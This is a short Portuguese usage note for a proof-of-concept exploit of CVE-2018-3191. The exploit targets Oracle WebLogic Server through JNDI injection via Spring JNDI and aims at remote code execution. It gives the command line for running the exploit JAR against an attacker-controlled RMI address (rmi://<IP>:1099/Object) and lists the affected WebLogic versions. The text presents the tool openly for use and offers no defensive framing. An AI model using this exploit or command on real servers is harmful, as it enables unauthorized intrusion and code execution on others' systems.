
Prova de conceito de exploit para CVE-2018-3191 direcionado ao WebLogic Server via injeção JNDI. Entrega um payload JAR para acionar execução remota de código por meio do Spring JNDI.
Uso:
java -jar weblogic-spring-jndi.jar <jndi_address>
Exemplo:
java -jar weblogic-spring-jndi.jar rmi://<IP>:1099/Object
Nota:
12.2.1.3
10.3.6.0
12.2.1.0
12.1.3.0
12.2.1.1